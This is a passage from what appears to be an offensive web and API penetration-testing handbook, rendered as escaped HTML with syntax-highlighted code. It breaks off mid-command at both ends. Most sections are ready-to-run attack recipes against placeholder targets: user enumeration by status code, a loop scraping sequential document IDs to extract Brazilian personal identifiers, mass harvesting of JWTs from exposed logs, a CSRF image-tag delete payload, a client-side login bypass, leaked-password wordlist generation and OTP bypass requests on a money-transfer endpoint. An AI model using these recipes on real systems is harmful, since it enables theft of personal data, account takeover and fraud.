&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Build a monitoring dashboard (poll every 3s):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;watch -n &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;curl -s -H &amp;#34;Host: TARGET&amp;#34; -H &amp;#34;User-Agent: Mozilla/5.0&amp;#34; http://IP/status&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If requests appear on the status page → you see in real time what other users are doing.&lt;/p&gt;
&lt;h3 id="264-user-enumeration-via-differentiated-http-status-codes" &gt;
&lt;div&gt;
&lt;a href="#264-user-enumeration-via-differentiated-http-status-codes"&gt;
##
&lt;/a&gt;
26.4 User Enumeration via Differentiated HTTP Status Codes
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Some endpoints return DIFFERENT status codes depending on whether the user exists:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Example: 400 = user EXISTS (password too short), 401 = does NOT exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -w &lt;span style="color:#a6d189"&gt;&amp;#34;\n%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/v1/auth/login&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;email&amp;#34;:&amp;#34;admin@target.com&amp;#34;,&amp;#34;password&amp;#34;:&amp;#34;12345&amp;#34;,&amp;#34;tenantSlug&amp;#34;:&amp;#34;target&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → 400: password too short → user EXISTS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → 401: unauthorized → user does NOT exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Common patterns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;400 vs 401&lt;/strong&gt;: user exists vs doesn&amp;rsquo;t exist&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;403 vs 404&lt;/strong&gt;: protected vs non-existent endpoint&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Different response time&lt;/strong&gt; (&amp;gt;200ms = exists)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Different body size&lt;/strong&gt; (different error message)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="265-pdf-pii-extraction-pipeline" &gt;
&lt;div&gt;
&lt;a href="#265-pdf-pii-extraction-pipeline"&gt;
##
&lt;/a&gt;
26.5 PDF PII Extraction Pipeline
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When APIs return PDFs in base64:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Fetch the PDF as base64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/get-doc.php&amp;#34;&lt;/span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;doc_id=148601&amp;#34;&lt;/span&gt; &amp;gt; response.json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Decode and extract text&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.data&amp;#39;&lt;/span&gt; response.json | base64 -d &amp;gt; documento.pdf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pdftotext documento.pdf - | grep -E &lt;span style="color:#a6d189"&gt;&amp;#34;CPF|CNPJ|RG|CEP|telefone&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Enumerate sequential IDs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;148000&lt;/span&gt; 148700&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/get-doc.php&amp;#34;&lt;/span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;doc_id=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.data&amp;#39;&lt;/span&gt; | base64 -d | pdftotext - - | grep &lt;span style="color:#a6d189"&gt;&amp;#34;CPF&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34; → ID: &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="266-jwt-token-harvesting-via-log-files" &gt;
&lt;div&gt;
&lt;a href="#266-jwt-token-harvesting-via-log-files"&gt;
##
&lt;/a&gt;
26.6 JWT Token Harvesting via Log Files
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Log files often accumulate hundreds of JWT tokens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download log&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET:8085/api-simple.log&amp;#34;&lt;/span&gt; &amp;gt; api.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract ALL JWTs (access + refresh tokens)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{10,}&amp;#39;&lt;/span&gt; api.log | wc -l
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# E.g.: 315 tokens in a single log file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Decode each one&amp;#39;s payload (without verifying the signature)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{10,}&amp;#39;&lt;/span&gt; api.log | &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; jwt; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;payload&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;&lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$jwt&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39;.&amp;#39;&lt;/span&gt; -f2 | base64 -d 2&amp;gt;/dev/null&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$payload&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.exp&amp;#39;&lt;/span&gt; 2&amp;gt;/dev/null &lt;span style="color:#737994;font-style:italic"&gt;# check expiration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Filter for tokens still valid by their exp timestamp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="267-delete-via-get--no-csrf-no-preflight" &gt;
&lt;div&gt;
&lt;a href="#267-delete-via-get--no-csrf-no-preflight"&gt;
##
&lt;/a&gt;
26.7 DELETE via GET — No CSRF, No Preflight
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;APIs that perform a DELETE when called with the GET method completely bypass CSRF protections:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Instead of:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DELETE /api/clients/delete/123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Use:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;GET https://TARGET.com/api/clients/deleteClient/123&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Works! No CSRF token, no CORS preflight, exploitable via &amp;lt;img&amp;gt; tag&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If this exists, the attack is trivial:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;lt;img src=&amp;#34;https://TARGET.com/api/clients/deleteClient/123&amp;#34;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Authenticated victim visits page → DELETE executed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Look for DELETE via GET in poorly implemented RESTful APIs — it&amp;rsquo;s more common than it seems.&lt;/p&gt;
&lt;h3 id="268-client-side-auth-bypass-via-window-globals" &gt;
&lt;div&gt;
&lt;a href="#268-client-side-auth-bypass-via-window-globals"&gt;
##
&lt;/a&gt;
26.8 Client-Side Auth Bypass via &lt;code&gt;window.*&lt;/code&gt; Globals
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;React/Angular/Vue SPAs that expose their auth functions on the global &lt;code&gt;window&lt;/code&gt; object:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// In the victim&amp;#39;s browser console (or via XSS):
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;.affiliateRegistered(&lt;span style="color:#a6d189"&gt;&amp;#39;forged-token-here&amp;#39;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;// Sets the auth token
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;.loginSuccessful(&lt;span style="color:#a6d189"&gt;&amp;#39;user-data&amp;#39;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;// Completes the login flow
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;.setToken(&lt;span style="color:#a6d189"&gt;&amp;#39;admin-jwt&amp;#39;&lt;/span&gt;) &lt;span style="color:#737994;font-style:italic"&gt;// Sets the admin JWT
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// → Dashboard now accessible with the forged token
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// → No server-side validation of the full login flow
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Detection&lt;/strong&gt;: Inspect the &lt;code&gt;window&lt;/code&gt; object in the browser console:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;Object&lt;/span&gt;.keys(&lt;span style="color:#99d1db"&gt;window&lt;/span&gt;).filter(k =&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;login&amp;#39;&lt;/span&gt;) &lt;span style="color:#99d1db;font-weight:bold"&gt;||&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;auth&amp;#39;&lt;/span&gt;) &lt;span style="color:#99d1db;font-weight:bold"&gt;||&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;token&amp;#39;&lt;/span&gt;) &lt;span style="color:#99d1db;font-weight:bold"&gt;||&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; k.toLowerCase().includes(&lt;span style="color:#a6d189"&gt;&amp;#39;register&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="269-password-pattern-recognition-for-wordlists" &gt;
&lt;div&gt;
&lt;a href="#269-password-pattern-recognition-for-wordlists"&gt;
##
&lt;/a&gt;
26.9 Password Pattern Recognition for Wordlists
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Analyze leaked passwords to identify reused patterns:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Passwords found in API responses&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;passwords &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;Pratibha7231@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Ankit7231@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Sumit7231@&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Manish7231@&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Identify pattern: [Name]7231@&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;^[A-Z][a-z]+7231@$&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Generate a wordlist from pattern + list of employee names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;employees &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;Rahul&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Priya&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Vikram&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Neha&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;Amit&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wordlist &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;7231@&amp;#34;&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; employees]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Other common patterns:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - [Name][Year]@ → Maria2024@&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Admin@[Number] → Admin@123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - [Company][Year] → target2024&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - password + variations → password, Password, password123, P@ssword&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2610-otp2fa-bypass--7-patterns" &gt;
&lt;div&gt;
&lt;a href="#2610-otp2fa-bypass--7-patterns"&gt;
##
&lt;/a&gt;
26.10 OTP/2FA Bypass — 7 Patterns
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;How to test&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;OTP in response&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check whether the OTP appears in the HTTP response body&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;OTP not invalidated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Use the same code twice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Null/empty OTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Send &lt;code&gt;otp=&lt;/code&gt; or omit the field&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;OTP over HTTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check whether the endpoint accepts HTTP (sniffable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Sequential OTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Try nearby codes (000001, 000002&amp;hellip;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Predictable OTP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Check if based on timestamp or user ID&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;2FA not required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Test sensitive endpoints (transfer, email-change) without OTP&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test OTP bypass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/transfer&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$USER_TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;to&amp;#34;:&amp;#34;dest&amp;#34;,&amp;#34;amount&amp;#34;:100,&amp;#34;otp&amp;#34;:&amp;#34;&amp;#34;}&amp;#39;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# empty OTP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/transfer&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$USER_TOKEN&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;to&amp;#34;:&amp;#34;dest&amp;#34;,&amp;#34;amount&amp;#34;:100}&amp;#39;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# no OTP field&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Reuse OTP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET.com/api/transfer&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
